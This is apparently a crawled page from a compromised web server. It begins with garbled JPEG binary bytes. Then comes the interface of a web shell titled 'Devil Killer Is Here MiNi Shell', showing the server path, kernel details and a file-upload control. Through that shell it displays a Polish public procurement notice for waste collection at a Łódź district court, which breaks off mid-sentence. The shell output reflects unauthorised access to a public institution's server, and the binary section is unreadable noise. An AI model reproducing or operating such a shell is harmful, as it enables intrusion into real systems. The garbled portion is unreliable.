JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241030/0057192501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów komunalnych z obiektów Sądu Rejonowego dla Łodzi-Śródmieścia w Łodzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy dla Łodzi-Śródmieścia w Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000323418</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Kościuszki 107/109</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-928</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(42) 201-2061/2062</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lodz.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lodz.sr.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów komunalnych z obiektów Sądu Rejonowego dla Łodzi-Śródmieścia w Łodzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-97b6af13-855f-403d-99f4-48cca7d11532</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00571925</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00227668/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Odbiór i zagospodarowanie odpadów komunalnych z obiektów Sądu Rejonowego dla Łodzi-Śródmieścia w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-97b6af13-855f-403d-99f4-48cca7d11532 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej, tj. za pomocą Platformy e-Zamówienia (zwanej dalej „Platformą”), dostępnej pod adresem internetowym: https://ezamowienia.gov.pl.<br/><br/>Zamawiający dopuszcza komunikację za pośrednictwem poczty elektronicznej na adres e-mail: przetargi@lodz.sr.gov.pl, za wyjątkiem składania i wycofania oferty, pod warunkiem, że wystąpią okoliczności niezależne od Wykonawcy, uniemożliwiające komunikację za pośrednictwem Platformy. Wykonawca, każdorazowo przy komunikowaniu się za pośrednictwem poczty elektronicznej, musi uzasadnić zaistnienie takich okoliczności, a także odpowiednio je udokumentować.<br/><br/>Szczegółowe informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami, zostały wskazane w rozdziale VII. SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy PZP, składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/><br/>Wykonawca, który zamierza wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Wykonawca, który utworzył konto na Platformie, po zalogowaniu ma możliwość złożenia oferty, wycofania oferty, a także dostęp do formularza do komunikacji.<br/><br/>Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie:<br/>1) wniosków o wyjaśnienie treści SWZ, a także pozostałych wniosków,<br/>2) wezwań i zawiadomień,<br/>3) dokumentów składanych na wezwanie Zamawiającego (podmiotowych środków dowodowych),<br/>4) wyjaśnień udzielanych na wezwanie Zamawiającego.<br/><br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” oraz zalogowania się na Platformie. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Wszystkie wiadomości, wysłane i odebrane w postępowaniu przez Wykonawcę, widoczne są po zalogowaniu - w podglądzie postępowania w zakładce „Komunikacja”.<br/><br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie ani logowania do Platformy.<br/><br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl - w tym celu należy kliknąć link „Zgłoś problem” (znajdujący się na dole strony) lub utworzyć zgłoszenie w „Centrum pomocy”.<br/><br/>Szczegółowe informacje o o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami, a także o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej, w tym sposób przygotowania i złożenia oferty, zostały określone w rozdziale VII. i VIII. SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące przetwarzania danych osobowych (RODO) zostały zawarte w rozdziale XVI. SWZ i załącznikach do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotyczące przetwarzania danych osobowych (RODO) zostały zawarte w rozdziale XVI. SWZ i załącznikach do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D.261.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywny odbiór i zagospodarowanie odpadów komunalnych, zbieranych selektywnie z nieruchomości niezamieszkałych, tj. z obiektów Sądu Rejonowego dla Łodzi-Śródmieścia w Łodzi przy al. Kościuszki 107/109 i ul. Wólczańskiej 138, zgodnie z haromonogramem określonym w dokumentach zamówienia. Miejscem odbioru odpadów (dla dwóch ww. obiektów) jest parking sądowy przy ul. Wólczańskiej 138. Pojemniki (kontenery MGB z tworzywa) stanowią własność Zamawiającego. <br/><br/>Odpady komunalne będą odbierane z pojemników (należących do Zamawiającego) wyłącznie do tego celu przeznaczonych, oznaczonych w widoczny z daleka, czytelny i ujednolicony sposób, zgodnie z wymogami rozporządzenia Ministra Klimatu i Środowiska z dnia 10 maja 2021 r. w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów (Dz. U. z 2021 r. poz. 906), przy czym przyjmuje się następujące kolory i oznaczenia pojemników dla poszczególnych frakcji odpadów:<br/>a) niesegregowane (zmieszane) odpady komunalne - pojemniki w kolorze czarnym lub co najmniej z czarną klapą, oznaczone napisem „Zmieszane&#34;,<br/>b) papier (frakcja odpadów, w której skład wchodzą odpady z papieru, w tym odpady z tektury, odpady opakowanie z papieru i opady opakowaniowe z tektury) - pojemniki w kolorze niebieskim, oznaczone napisem „Papier”,<br/>c) szkło (frakcja odpadów, w której skład wchodzą odpady ze szkła, w tym odpady opakowanie ze szkła) - pojemniki w kolorze zielonym, oznaczone napisem „Szkło”,<br/>d) metale i tworzywa sztuczne (frakcja odpadów, w której skład wchodzą odpady metali, w tym odpady opakowaniowe z metali, odpady z tworzyw sztucznych, w tym odpady opakowaniowe z tworzyw sztucznych, oraz odpady opakowaniowe wielomateriałowe) - pojemniki w kolorze żółtym, oznaczone napisem „Metale i tworzywa sztuczne”,<br/>e) biodegradowalne (bioodpady) - pojemniki w kolorze brązowym, oznaczone napisem „Bio”.<br/><br/>Szczegółowy opis, zakres, sposób i warunki realizacji przedmiotu zamówienia określone zostały w załączniku nr 1 do SWZ oraz w załącznikach nr 5A i 5B do SWZ (projektowane postanowienia umów w sprawie zamówienia publicznego, które zostaną wprowadzone do treści poszczególnych umów - w podziale na części przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta może uzyskać maksymalnie 100,00 pkt. Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/><br/>Za ofertę najkorzystniejszą - dla każdej części przedmiotu zamówienia z osobna - zostanie uznana oferta, która spełni wszystkie wymagania określone w SWZ oraz uzyska największą liczbę punktów przyznanych w kryterium oceny ofert „Cena ofertowa brutto”. Ocena punktowa dokonana zostanie na podstawie łącznej ceny ofertowej brutto dla każdej części zamówienia wskazanej przez<br/>Wykonawcę w ofercie.<br/><br/>Ocena punktowa dokonana zostanie w sposób określony w rozdziale X. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest sukcesywny odbiór i zagospodarowanie odpadów komunalnych, zbieranych selektywnie z nieruchomości niezamieszkałych, tj. z obiektów Sądu Rejonowego dla Łodzi-Śródmieścia w Łodzi przy ul. Pomorskiej 21 (zakres usługi objęty opcją) i ul. Pomorskiej 37 (zakres główny usługi), zgodnie z harmonogramem określonym w dokumentach zamówienia. Pojemniki (kontenery MGB z tworzywa) stanowią własność Zamawiającego. <br/><br/>Odpady komunalne będą odbierane z pojemników (należących do Zamawiającego) wyłącznie do tego celu przeznaczonych, oznaczonych w widoczny z daleka, czytelny i ujednolicony sposób, zgodnie z wymogami rozporządzenia Ministra Klimatu i Środowiska z dnia 10 maja 2021 r. w sprawie szczegółowego sposobu selektywnego zbierania wybranych frakcji odpadów (Dz. U. z 2021 r. poz. 906), przy czym przyjmuje się następujące kolory i oznaczenia pojemników dla poszczególnych frakcji odpadów:<br/>a) niesegregowane (zmieszane) odpady komunalne - pojemniki w kolorze czarnym lub co najmniej z czarną klapą, oznaczone napisem „Zmieszane&#34;,<br/>b) papier (frakcja odpadów, w której skład wchodzą odpady z papieru, w tym odpady z tektury, odpady opakowanie z papieru i opady opakowaniowe z tektury) - pojemniki w kolorze niebieskim, oznaczone napisem „Papier”,<br/>c) szkło (frakcja odpadów, w której skład wchodzą odpady ze szkła, w tym odpady opakowanie ze szkła) - pojemniki w kolorze zielonym, oznaczone napisem „Szkło”,<br/>d) metale i tworzywa sztuczne (frakcja odpadów, w której skład wchodzą odpady metali, w tym odpady opakowaniowe z metali, odpady z tworzyw sztucznych, w tym odpady opakowaniowe z tworzyw sztucznych, oraz odpady opakowaniowe wielomateriałowe) - pojemniki w kolorze żółtym, oznaczone napisem „Metale i tworzywa sztuczne”,<br/>e) biodegradowalne (bioodpady) - pojemniki w kolorze brązowym, oznaczone napisem „Bio”.<br/><br/>Szczegółowy opis, zakres, sposób i warunki realizacji przedmiotu zamówienia określone zostały w załączniku nr 1 do SWZ oraz w załącznikach nr 5A i 5B do SWZ (projektowane postanowienia umów w sprawie zamówienia publicznego, które zostaną wprowadzone do treści poszczególnych umów - w podziale na części przedmiotu zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90511000-2 - Usługi wywozu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Na podstawie art. 441 ust. 1 ustawy PZP Zamawiający przewiduje skorzystanie z opcji w części II przedmiotu zamówienia, na zasadach szczegółowo określonych w dokumentach zamówienia. Opcja dotyczy terminu realizacji zamówienia wyłącznie w zakresie świadczenia usługi odbioru i zagospodarowania odpadów komunalnych z lokalizacji przy ul. Pomorskiej 21, i obejmuje prawo Zamawiającego do wcześniejszego zakończenia świadczenia usługi w tym zakresie:<br/>- skorzystanie z opcji przez Zamawiającego polegać będzie na zmniejszeniu zakresu przedmiotu zamówienia, tj. możliwości wcześniejszego zakończenia realizacji zamówienia i rezygnacji ze świadczenia usługi wyłącznie w zakresie lokalizacji przy ul. Pomorskiej 21,<br/>- po skorzystaniu z opcji przez Zamawiającego zakres główny usługi, który obejmuje odbiór i zagospodarowanie odpadów komunalnych z lokalizacji przy ul. Pomorskiej 37, pozostanie bez zmian (skorzystanie z opcji nie wpływa na realizację zakresu głównego części II przedmiotu zamówienia),<br/>- zakończenie realizacji usługi w zakresie objętym opcją będzie zależne od okoliczności faktycznych polegających na dokonaniu pełnej przeprowadzki Zamawiającego z obiektów przy ul. Pomorskiej 21 do nowej siedziby przy ul. Wojska Polskiego 180 w Łodzi,<br/>- skorzystanie z opcji będzie warunkowane okoliczności formalnymi - Zamawiający zawiadomi pisemnie Wykonawcę o uruchomieniu opcji - w terminie co najmniej 14 dni kalendarzowych przed koniecznością zakończenia świadczenia usługi w zakresie objętym opcją, <br/>- termin realizacji usługi w zakresie objętym opcją wyniesie od 1 miesiąca (minimalnie) do 12 miesięcy (maksymalnie), jednak nie wcześniej niż od 1 grudnia 2024 r.<br/>- termin realizacji zakresu głównego usługi wynosi 24 miesiące, jednak nie wcześniej niż od 1 grudnia 2024 r.<br/>- zasady skorzystania z opcji zostały określone w dokumentach zamówienia, w szczególności w SWZ oraz załączniku nr 5B do SWZ (projektowane postanowienia umowy dot. części II przedmiotu zamówienia). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta może uzyskać maksymalnie 100,00 pkt. Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku.<br/><br/>Za ofertę najkorzystniejszą - dla każdej części przedmiotu zamówienia z osobna - zostanie uznana oferta, która spełni wszystkie wymagania określone w SWZ oraz uzyska największą liczbę punktów przyznanych w kryterium oceny ofert „Cena ofertowa brutto”. Ocena punktowa dokonana zostanie na podstawie łącznej ceny ofertowej brutto dla każdej części zamówienia wskazanej przez<br/>Wykonawcę w ofercie.<br/><br/>Ocena punktowa dokonana zostanie w sposób określony w rozdziale X. SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/><br/>O udzielenie zamówienia - w odniesieniu zarówno do części I, jak i części II przedmiotu zamówienia - może ubiegać się Wykonawca, który wykaże, że posiada:<br/>• wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości, o którym mowa w art. 9c ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2024 r. poz. 399) - rejestr prowadzony przez Urząd Miasta Łodzi Departament Pracy, Edukacji i Kultury Wydział Gospodarki Komunalnej z siedzibą w Łodzi przy ul. Piotrkowskiej 175. Wpis do rejestru winien obejmować co najmniej odpady komunalne, o których mowa w SWZ w rozdziale II ust. 1 pkt 2);<br/>• wpis do rejestru podmiotów wprowadzających produkty, produkty w opakowaniach i gospodarujących odpadami, który stanowi integralną część bazy danych o produktach i opakowaniach oraz o gospodarce odpadami (tzw. rejestr BDO), zgodnie z ustawą z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2023 r. poz. 1587 ze zm.).<br/><br/>2. Warunki udziału w postępowaniu dotyczące sytuacji finansowej lub ekonomicznej:<br/><br/>O udzielenie zamówienia może ubiegać się Wykonawca, który wykaże, że posiada:<br/>• dla części I przedmiotu zamówienia - ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł (słownie: sto tysięcy złotych 00/100),<br/>• dla części II przedmiotu zamówienia - ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł (słownie: sto tysięcy złotych 00/100).<br/>W przypadku składania oferty na obie części zamówienia, Wykonawca spełni warunek, jeżeli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100.000,00 zł (słownie: sto tysięcy złotych 00/100).<br/>Sposób spełniania ww. warunku udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia został określony w rozdziale III SWZ.<br/><br/>3. Warunki udziału w postępowaniu dotyczące zdolności 